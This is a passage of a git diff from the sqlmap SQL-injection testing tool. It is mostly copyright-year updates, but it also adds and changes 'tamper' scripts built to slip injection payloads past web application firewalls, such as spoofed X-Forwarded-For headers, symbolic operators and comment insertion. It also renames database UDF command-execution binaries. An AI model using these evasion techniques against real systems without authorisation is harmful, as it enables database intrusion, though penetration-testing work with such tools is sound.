+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/__init__.py b/tamper/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/tamper/__init__.py
+++ b/tamper/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py
index 6f779e61d..78c17f328 100644
--- a/tamper/apostrophemask.py
+++ b/tamper/apostrophemask.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py
index 75f652341..6b0930679 100644
--- a/tamper/apostrophenullencode.py
+++ b/tamper/apostrophenullencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py
index 763c78643..faae3a2e4 100644
--- a/tamper/appendnullbyte.py
+++ b/tamper/appendnullbyte.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/base64encode.py b/tamper/base64encode.py
index f5520f067..cda5619dd 100644
--- a/tamper/base64encode.py
+++ b/tamper/base64encode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/between.py b/tamper/between.py
index f2e0f91bf..f7331bd9f 100644
--- a/tamper/between.py
+++ b/tamper/between.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py
index c80a48c28..a26cdadf7 100644
--- a/tamper/bluecoat.py
+++ b/tamper/bluecoat.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py
index e6af4a2f9..3b6a5301f 100644
--- a/tamper/chardoubleencode.py
+++ b/tamper/chardoubleencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/charencode.py b/tamper/charencode.py
index 3e7f76183..9df3e9624 100644
--- a/tamper/charencode.py
+++ b/tamper/charencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py
index e36b055bd..09e602957 100644
--- a/tamper/charunicodeencode.py
+++ b/tamper/charunicodeencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py
index c087e6e3f..5182bd8d5 100644
--- a/tamper/concat2concatws.py
+++ b/tamper/concat2concatws.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py
index 9b78ee8ca..d9ccf0082 100644
--- a/tamper/equaltolike.py
+++ b/tamper/equaltolike.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/greatest.py b/tamper/greatest.py
index a7fbfeaff..a1c3f8df3 100644
--- a/tamper/greatest.py
+++ b/tamper/greatest.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -36,7 +36,7 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
-        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)
+        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>#-]+)", payload)
 
         if match:
             _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4))
diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py
index 7bd9d5e23..c0d0eea5c 100644
--- a/tamper/halfversionedmorekeywords.py
+++ b/tamper/halfversionedmorekeywords.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py
index 749a271ae..499cc6218 100644
--- a/tamper/ifnull2ifisnull.py
+++ b/tamper/ifnull2ifisnull.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py
new file mode 100644
index 000000000..7c146a30e
--- /dev/null
+++ b/tamper/informationschemacomment.py
@@ -0,0 +1,27 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def tamper(payload, **kwargs):
+    """
+    Add a comment to the end of all occurrences of (blacklisted) "information_schema" identifier
+
+    >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
+    'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
+    """
+
+    retVal = payload
+
+    if payload:
+        retVal = re.sub(r"(?i)(information_schema)\.", "\g<1>/**/.", payload)
+
+    return retVal
diff --git a/tamper/lowercase.py b/tamper/lowercase.py
index fae01a3e3..e06706af5 100644
--- a/tamper/lowercase.py
+++ b/tamper/lowercase.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py
index 7901fd656..1d38e5344 100644
--- a/tamper/modsecurityversioned.py
+++ b/tamper/modsecurityversioned.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py
index 8abe281aa..ac13da0b8 100644
--- a/tamper/modsecurityzeroversioned.py
+++ b/tamper/modsecurityzeroversioned.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py
index 83c4e9d79..c08607512 100644
--- a/tamper/multiplespaces.py
+++ b/tamper/multiplespaces.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py
index 49beda7bb..5feb443cc 100644
--- a/tamper/nonrecursivereplacement.py
+++ b/tamper/nonrecursivereplacement.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py
index 2723cb004..ac2885d7a 100644
--- a/tamper/overlongutf8.py
+++ b/tamper/overlongutf8.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/percentage.py b/tamper/percentage.py
index dcdeb9992..e54495739 100644
--- a/tamper/percentage.py
+++ b/tamper/percentage.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/randomcase.py b/tamper/randomcase.py
index 6f0a0a65e..a188ff0cc 100644
--- a/tamper/randomcase.py
+++ b/tamper/randomcase.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -44,10 +44,14 @@ def tamper(payload, **kwargs):
             word = match.group()
 
             if word.upper() in kb.keywords:
-                _ = str()
+                while True:
+                    _ = ""
 
-                for i in xrange(len(word)):
-                    _ += word[i].upper() if randomRange(0, 1) else word[i].lower()
+                    for i in xrange(len(word)):
+                        _ += word[i].upper() if randomRange(0, 1) else word[i].lower()
+
+                    if len(_) > 1 and _ not in (_.lower(), _.upper()):
+                        break
 
                 retVal = retVal.replace(word, _)
 
diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py
index 1b6b0a04c..6c0894eb1 100644
--- a/tamper/randomcomments.py
+++ b/tamper/randomcomments.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/securesphere.py b/tamper/securesphere.py
index fc5896433..ab83f46fc 100644
--- a/tamper/securesphere.py
+++ b/tamper/securesphere.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/sp_password.py b/tamper/sp_password.py
index 25cf3a1e8..959e50257 100644
--- a/tamper/sp_password.py
+++ b/tamper/sp_password.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2comment.py b/tamper/space2comment.py
index ad32f39e5..399a2c0ee 100644
--- a/tamper/space2comment.py
+++ b/tamper/space2comment.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2dash.py b/tamper/space2dash.py
index 69eb43f71..cdd828d56 100644
--- a/tamper/space2dash.py
+++ b/tamper/space2dash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2hash.py b/tamper/space2hash.py
index cb59750c1..a50a3a7c2 100644
--- a/tamper/space2hash.py
+++ b/tamper/space2hash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py
index f208e9f37..0dbaf5c2a 100644
--- a/tamper/space2morehash.py
+++ b/tamper/space2morehash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py
index 0f1dcbad3..fc0542f53 100644
--- a/tamper/space2mssqlblank.py
+++ b/tamper/space2mssqlblank.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py
index 6c911fb42..cddfd6179 100644
--- a/tamper/space2mssqlhash.py
+++ b/tamper/space2mssqlhash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py
index 4538ec78c..a0ac1da68 100644
--- a/tamper/space2mysqlblank.py
+++ b/tamper/space2mysqlblank.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py
index d8cbf542d..4a4f9821c 100644
--- a/tamper/space2mysqldash.py
+++ b/tamper/space2mysqldash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2plus.py b/tamper/space2plus.py
index cb8facf91..38211026a 100644
--- a/tamper/space2plus.py
+++ b/tamper/space2plus.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py
index ebe22edcc..98612534a 100644
--- a/tamper/space2randomblank.py
+++ b/tamper/space2randomblank.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py
new file mode 100644
index 000000000..cb8e91630
--- /dev/null
+++ b/tamper/symboliclogical.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOWEST
+
+def dependencies():
+    pass
+
+def tamper(payload, **kwargs):
+    """
+    Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
+
+    >>> tamper("1 AND '1'='1")
+    '1 && '1'='1'
+    """
+
+    retVal = payload
+
+    if payload:
+        retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))
+
+    return retVal
diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py
index 35ce36dfb..3bb234141 100644
--- a/tamper/unionalltounion.py
+++ b/tamper/unionalltounion.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py
index d56136f7f..c2bcca8da 100644
--- a/tamper/unmagicquotes.py
+++ b/tamper/unmagicquotes.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -26,7 +26,7 @@ def tamper(payload, **kwargs):
         * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
 
     >>> tamper("1' AND 1=1")
-    '1%bf%27 AND 1=1-- '
+    '1%bf%27-- '
     """
 
     retVal = payload
@@ -44,9 +44,10 @@ def tamper(payload, **kwargs):
                 continue
 
         if found:
-            _ = re.sub("(?i)\s*(AND|OR)[\s(]+'[^']+'\s*(=|LIKE)\s*'.*", "", retVal)
+            _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal)
             if _ != retVal:
                 retVal = _
                 retVal += "-- "
-
+            elif not any(_ in retVal for _ in ('#', '--', '/*')):
+                retVal += "-- "
     return retVal
diff --git a/tamper/varnish.py b/tamper/varnish.py
index 48e94b20b..00d54bb43 100644
--- a/tamper/varnish.py
+++ b/tamper/varnish.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -14,7 +14,7 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Append a HTTP Request Parameter to bypass
+    Append a HTTP header 'X-originating-IP' to bypass
     WAF Protection of Varnish Firewall
 
     Notes:
diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py
index 42e3212b7..7c5c5db32 100644
--- a/tamper/versionedkeywords.py
+++ b/tamper/versionedkeywords.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py
index df07e2424..d5fc44db1 100644
--- a/tamper/versionedmorekeywords.py
+++ b/tamper/versionedmorekeywords.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py
new file mode 100644
index 000000000..e2bcdbca9
--- /dev/null
+++ b/tamper/xforwardedfor.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+from random import sample
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def randomIP():
+    numbers = []
+    while not numbers or numbers[0] in (10, 172, 192):
+        numbers = sample(xrange(1, 255), 4)
+    return '.'.join(str(_) for _ in numbers)
+
+def tamper(payload, **kwargs):
+    """
+    Append a fake HTTP header 'X-Forwarded-For' to bypass
+    WAF (usually application based) protection
+    """
+
+    headers = kwargs.get("headers", {})
+    headers["X-Forwarded-For"] = randomIP()
+    return payload
diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py
index eb30b9c6d..95d2b00be 100644
--- a/thirdparty/ansistrm/ansistrm.py
+++ b/thirdparty/ansistrm/ansistrm.py
@@ -62,6 +62,8 @@ class ColorizingStreamHandler(logging.StreamHandler):
             self.flush()
         except (KeyboardInterrupt, SystemExit):
             raise
+        except IOError:
+            pass
         except:
             self.handleError(record)
 
diff --git a/thirdparty/bottle/__init__.py b/thirdparty/bottle/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/thirdparty/bottle/__init__.py
+++ b/thirdparty/bottle/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/thirdparty/magic/magic.py b/thirdparty/magic/magic.py
index 036983ae0..e03ddd9ac 100644
--- a/thirdparty/magic/magic.py
+++ b/thirdparty/magic/magic.py
@@ -111,7 +111,10 @@ try:
 
     # This is necessary because find_library returns None if it doesn't find the library
     if dll:
-        libmagic = ctypes.CDLL(dll)
+        try:
+            libmagic = ctypes.CDLL(dll)
+        except WindowsError:
+            pass
 
     if not libmagic or not libmagic._name:
         import sys
diff --git a/thirdparty/multipart/multipartpost.py b/thirdparty/multipart/multipartpost.py
index b3ea1eebd..e9aa1a85e 100644
--- a/thirdparty/multipart/multipartpost.py
+++ b/thirdparty/multipart/multipartpost.py
@@ -81,14 +81,19 @@ class MultipartPostHandler(urllib2.BaseHandler):
             buf = ''
 
         for (key, value) in vars:
-            buf += '--%s\r\n' % boundary
-            buf += 'Content-Disposition: form-data; name="%s"' % key
-            buf += '\r\n\r\n' + value + '\r\n'
+            if key is not None and value is not None:
+                buf += '--%s\r\n' % boundary
+                buf += 'Content-Disposition: form-data; name="%s"' % key
+                buf += '\r\n\r\n' + value + '\r\n'
 
         for (key, fd) in files:
             file_size = os.fstat(fd.fileno())[stat.ST_SIZE] if isinstance(fd, file) else fd.len
             filename = fd.name.split('/')[-1] if '/' in fd.name else fd.name.split('\\')[-1]
-            contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+            try:
+                contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+            except:
+                # Reference: http://bugs.python.org/issue9291
+                contenttype = 'application/octet-stream'
             buf += '--%s\r\n' % boundary
             buf += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)
             buf += 'Content-Type: %s\r\n' % contenttype
diff --git a/thirdparty/pagerank/pagerank.py b/thirdparty/pagerank/pagerank.py
index 60a654fd1..977a93744 100644
--- a/thirdparty/pagerank/pagerank.py
+++ b/thirdparty/pagerank/pagerank.py
@@ -15,6 +15,7 @@
 import urllib
 
 def get_pagerank(url):
+    url = url.encode('utf8') if isinstance(url, unicode) else url
     _ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url))
     try:
         f = urllib.urlopen(_)
diff --git a/txt/common-columns.txt b/txt/common-columns.txt
index edbba30a0..3464db5fc 100644
--- a/txt/common-columns.txt
+++ b/txt/common-columns.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 id
diff --git a/txt/common-outputs.txt b/txt/common-outputs.txt
index efe569bed..623c07554 100644
--- a/txt/common-outputs.txt
+++ b/txt/common-outputs.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 [Banners]
diff --git a/txt/common-tables.txt b/txt/common-tables.txt
index ee4e71b48..9468c9382 100644
--- a/txt/common-tables.txt
+++ b/txt/common-tables.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 users
diff --git a/txt/keywords.txt b/txt/keywords.txt
index 496d41c58..240c47429 100644
--- a/txt/keywords.txt
+++ b/txt/keywords.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 # SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
diff --git a/txt/user-agents.txt b/txt/user-agents.txt
index 6c49e41cc..c8dea4c1c 100644
--- a/txt/user-agents.txt
+++ b/txt/user-agents.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1)
diff --git a/udf/mysql/linux/32/lib_mysqludf_sys.so b/udf/mysql/linux/32/lib_mysqludf_sys.so
deleted file mode 100644
index 9eb5e82ba..000000000
Binary files a/udf/mysql/linux/32/lib_mysqludf_sys.so and /dev/null differ
diff --git a/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/udf/mysql/linux/32/lib_mysqludf_sys.so_
new file mode 100644
index 000000000..7e0eeb95e
Binary files /dev/null and b/udf/mysql/linux/32/lib_mysqludf_sys.so_ differ
diff --git a/udf/mysql/linux/64/lib_mysqludf_sys.so b/udf/mysql/linux/64/lib_mysqludf_sys.so
deleted file mode 100644
index 9c6999ecd..000000000
Binary files a/udf/mysql/linux/64/lib_mysqludf_sys.so and /dev/null differ
diff --git a/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/udf/mysql/linux/64/lib_mysqludf_sys.so_
new file mode 100644
index 000000000..c7a4d7a10
Binary files /dev/null and b/udf/mysql/linux/64/lib_mysqludf_sys.so_ differ
diff --git a/udf/mysql/windows/32/lib_mysqludf_sys.dll b/udf/mysql/windows/32/lib_mysqludf_sys.dll
deleted file mode 100644
index a2196a25e..000000000
Binary files a/udf/mysql/windows/32/lib_mysqludf_sys.dll and /dev/null differ
diff --git a/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/udf/mysql/windows/32/lib_mysqludf_sys.dll_
new file mode 100644
index 000000000..ae438d636
Binary files /dev/null and b/udf/mysql/windows/32/lib_mysqludf_sys.dll_ differ
diff --git a/udf/mysql/windows/64/lib_mysqludf_sys.dll b/udf/mysql/windows/64/lib_mysqludf_sys.dll
deleted file mode 100644
index 3de734fc9..000000000
Binary files a/udf/mysql/windows/64/lib_mysqludf_sys.dll and /dev/null differ
diff --git a/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/udf/mysql/windows/64/lib_mysqludf_sys.dll_
new file mode 100644
index 000000000..c06f77f22
Binary files /dev/null and b/udf/mysql/windows/64/lib_mysqludf_sys.dll_ differ
diff --git a/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so
deleted file mode 100644
index ce33ad34e..000000000
Binary files a/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so and /dev/null differ
